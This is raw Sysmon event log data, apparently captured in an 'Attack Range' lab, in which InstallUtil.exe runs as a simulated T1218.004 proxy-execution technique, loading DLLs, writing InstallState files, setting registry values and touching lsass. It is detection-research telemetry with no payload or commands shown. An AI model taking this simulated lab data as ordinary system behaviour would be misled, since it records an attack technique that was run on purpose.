CorporationSMDiagnostics.dllMD5=6520C012D5164F22C0A4F96E82F7979A,SHA256=BD1F07E923DBA63862A75A4D312268EFF3391C155C1103B20964DF8F7E21D5C1false-Unavailable 11241100x800000000000000057456353Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:47.034{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Users\Administrator\AppData\Local\Temp\2\T1218.004.InstallState2021-11-12 14:22:43.753 23542300x800000000000000057456352Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:47.034{8B6011A9-78B6-618E-26F7-04000000F101}9344ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Users\Administrator\AppData\Local\Temp\2\T1218.004.InstallStateMD5=8340E57C6861AA09B7AC38E04EE8E33D,SHA256=A9E636FFAA636D4FDA92BCEE8422B7ABF8ABCF0BCF5FF860CEAF23E327FE0B21falsetrue 734700x800000000000000057456351Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:47.034{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Runteb92aa12#\8a6f1fd5072bb947ca74e50ce391a3d3\System.Runtime.Serialization.ni.dll4.8.4261.0 built by: NET48REL1LAST_BSystem.Runtime.Serialization.dllMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Runtime.Serialization.dllMD5=D2D5D6F2005BB57034DBE003EE9D14A0,SHA256=53E2A4CB20464A9CDCE924F9513882F3DA575DBE10B68C9437EA37C074AEA798false-Unavailable 734700x800000000000000057456350Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:47.034{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057456349Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:47.019{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057456348Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:47.019{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 734700x800000000000000057456347Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:47.019{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057456346Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:47.019{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValid 734700x800000000000000057456345Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:47.019{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\shell32.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=837B8644B9CE47EC28152E7D764886E0,SHA256=C5BA64473FB38E6B4592EAFA642AF82715CBC676190985D8D8D4150CE840044FtrueMicrosoft WindowsValid 734700x800000000000000057456344Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:47.019{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\e1c9eb2e855d26a67dbf39e6236430de\System.Xml.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Xml.dllMD5=695EB4BE24FC9DB279F2427D31AD35D4,SHA256=014EDA5BD7025A6F01BEA1F6E05663FE4BCE64FA95B7378EBF9C827991B32E64false-Unavailable 734700x800000000000000057456343Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:47.019{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\5b778442ed2d60a5de14f752a124bf1a\System.Configuration.ni.dll4.8.4190.0 built by: NET48REL1LAST_BSystem.Configuration.dllMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Configuration.dllMD5=9EAA59368783AFE4107F28B6ED8AB1E6,SHA256=BBAC50983BA9B2EDA9CBA8FD0F1DCABF71D24D736A973BA164AF6917A3FC2E7Ffalse-Unavailable 734700x800000000000000057456342Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:47.019{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\625a7ccd665c33cee4988e3cd136b902\System.Core.ni.dll4.8.4395.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Core.dllMD5=27741782AAECFE54A201896D93BA1C9A,SHA256=7389517EE682897300DE398245D2C3EE37E5060CF6320138430A8AA86E6E737Bfalse-Unavailable 734700x800000000000000057456341Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:47.019{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057456340Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:47.019{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057456339Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:47.019{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValid 734700x800000000000000057456338Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:47.019{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValid 734700x800000000000000057456337Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:47.019{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\windows.storage.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=1D7997E3AFC26B85024D33F835E18056,SHA256=B2376967E156D4971FB66059F6367030AF937943D2EBF80AF856E643B6E95BBFtrueMicrosoft WindowsValid 13241300x800000000000000057456336Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 14:22:47.019{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000) 13241300x800000000000000057456335Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 14:22:47.019{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000) 13241300x800000000000000057456334Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 14:22:47.019{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000) 13241300x800000000000000057456333Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 14:22:47.019{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000) 10341000x800000000000000057456332Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:47.019{8B6011A9-886B-6164-0B00-00000000F101}6489732C:\Windows\system32\lsass.exe{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057456331Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:47.019{8B6011A9-886B-6164-0B00-00000000F101}6489732C:\Windows\system32\lsass.exe{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057456330Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:47.019{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 12241200x800000000000000057456329Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 14:22:47.003{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap 734700x800000000000000057456328Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:47.003{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057456327Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:47.003{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=D287E1BC5A148E2BCB482DBD0E925738,SHA256=1C2428AD170165DD8DE960C835D9AAB5B268300A676FE935B177ED5D2607430DtrueMicrosoft WindowsValid 734700x800000000000000057456326Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:47.003{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 734700x800000000000000057456325Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:47.003{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\iertutil.dll11.00.14393.4467 (rs1_release.210604-1844)Run time utility for Internet ExplorerInternet ExplorerMicrosoft CorporationIeRtUtil.dllMD5=1D608361848C3A3AC56488995E8D0BB1,SHA256=D95DE5DBAD08E22CB0CFB9322220E752F16124C15867F7748E4D64795E400EBFtrueMicrosoft WindowsValid 734700x800000000000000057456324Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:47.003{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\urlmon.dll11.00.14393.4530 (rs1_release.210705-0736)OLE32 Extensions for Win32Internet ExplorerMicrosoft CorporationUrlMon.dllMD5=B63DBDFEC215CF37259DC4A88ADBD0E7,SHA256=67B02F3DE0AF36E76C2D259CE7833EDA4FE33D935538E8A4C1E7E82130870FC1trueMicrosoft WindowsValid 734700x800000000000000057456323Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:47.003{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\bcacaaa795f281ac827a1af051d3a051\System.Configuration.Install.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Configuration.Install.dllMD5=DF0A266E1C073131336B9597E2543820,SHA256=F1079A19E1C6E19EB1A2BA701A3919A0A0474EDFA579D8F3EC05965ECDF5F6FDfalse-Unavailable 734700x800000000000000057456322Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:47.003{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll4.8.4380.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.dllMD5=C928B5301D291782935A1342A01F6125,SHA256=945ACD65BDCE2291C3C2D15FD910F6E331570D516D386C53FDFB5EC38BE69125false-Unavailable 734700x800000000000000057456321Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:46.988{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\clrjit.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Just-In-Time CompilerMicrosoft® .NET FrameworkMicrosoft Corporationclrjit.dllMD5=0745D9F1BAC58E47CC87656768304313,SHA256=BBA1936354A9EF269B283FE706A74B73BE39CAF4DD57AB0D1CD06A1C75E260A2trueMicrosoft CorporationValid 534500x800000000000000057457035Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.347{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe 23542300x800000000000000057457034Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.347{8B6011A9-78B9-618E-2CF7-04000000F101}7064ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Users\Administrator\AppData\Local\Temp\2\T1218.004.InstallStateMD5=A98209979976566EFA95C72A0DF69FB6,SHA256=CA8E67928052DAACF925BDC622EBB5F9DF8D0033464916FC84D392F46F60429Bfalsetrue 734700x800000000000000057457033Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.331{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Servd1dec626#\367b724a8a8d7a8816e8029637e9af91\System.ServiceModel.Internals.ni.dll4.8.4261.0 built by: NET48REL1LAST_BSystem.ServiceModel.Internals.dllMicrosoft® .NET FrameworkMicrosoft CorporationSystem.ServiceModel.Internals.dllMD5=D9D712B2F98C74C18C71B40FBFF12C72,SHA256=C1CB9C1223FFBBFA879B7972A34AD437C308829152CFF855802A6350C75B46A7false-Unavailable 734700x800000000000000057457032Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.331{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\SMDiagnostics\32788288a07982cb10ab4196907ef578\SMDiagnostics.ni.dll4.8.4261.0 built by: NET48REL1LAST_BSMDiagnostics.dllMicrosoft® .NET FrameworkMicrosoft CorporationSMDiagnostics.dllMD5=6520C012D5164F22C0A4F96E82F7979A,SHA256=BD1F07E923DBA63862A75A4D312268EFF3391C155C1103B20964DF8F7E21D5C1false-Unavailable 734700x800000000000000057457031Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.331{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Runteb92aa12#\8a6f1fd5072bb947ca74e50ce391a3d3\System.Runtime.Serialization.ni.dll4.8.4261.0 built by: NET48REL1LAST_BSystem.Runtime.Serialization.dllMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Runtime.Serialization.dllMD5=D2D5D6F2005BB57034DBE003EE9D14A0,SHA256=53E2A4CB20464A9CDCE924F9513882F3DA575DBE10B68C9437EA37C074AEA798false-Unavailable 734700x800000000000000057457030Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.331{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057457029Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.331{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057457028Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.331{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 734700x800000000000000057457027Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.331{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057457026Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.316{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValid 734700x800000000000000057457025Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.316{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\shell32.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=837B8644B9CE47EC28152E7D764886E0,SHA256=C5BA64473FB38E6B4592EAFA642AF82715CBC676190985D8D8D4150CE840044FtrueMicrosoft WindowsValid 734700x800000000000000057457024Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.316{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\e1c9eb2e855d26a67dbf39e6236430de\System.Xml.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Xml.dllMD5=695EB4BE24FC9DB279F2427D31AD35D4,SHA256=014EDA5BD7025A6F01BEA1F6E05663FE4BCE64FA95B7378EBF9C827991B32E64false-Unavailable 734700x800000000000000057457023Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.316{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\5b778442ed2d60a5de14f752a124bf1a\System.Configuration.ni.dll4.8.4190.0 built by: NET48REL1LAST_BSystem.Configuration.dllMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Configuration.dllMD5=9EAA59368783AFE4107F28B6ED8AB1E6,SHA256=BBAC50983BA9B2EDA9CBA8FD0F1DCABF71D24D736A973BA164AF6917A3FC2E7Ffalse-Unavailable 734700x800000000000000057457022Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.316{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\625a7ccd665c33cee4988e3cd136b902\System.Core.ni.dll4.8.4395.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Core.dllMD5=27741782AAECFE54A201896D93BA1C9A,SHA256=7389517EE682897300DE398245D2C3EE37E5060CF6320138430A8AA86E6E737Bfalse-Unavailable 734700x800000000000000057457021Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.316{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 